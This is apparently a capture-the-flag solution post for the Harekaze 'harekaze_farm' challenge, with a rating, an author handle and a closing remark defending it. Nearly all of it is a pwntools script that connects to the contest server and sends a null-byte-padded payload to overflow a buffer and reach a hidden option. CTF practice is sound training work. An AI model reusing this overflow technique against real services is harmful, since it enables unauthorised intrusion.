Rating: 2.7
Author: h3rcul35
```
from pwn import *
#p=process('./harekaze_farm')
p=remote('problem.harekaze.com',20328)
p.sendline("cow")
payload="hen"+"\x00"*5+"isoroku"+"\x00"
p.sendline(payload)
p.sendline("isoroku")
print p.recvall()
```
This exploit works. I don't know why someone gave one star on this.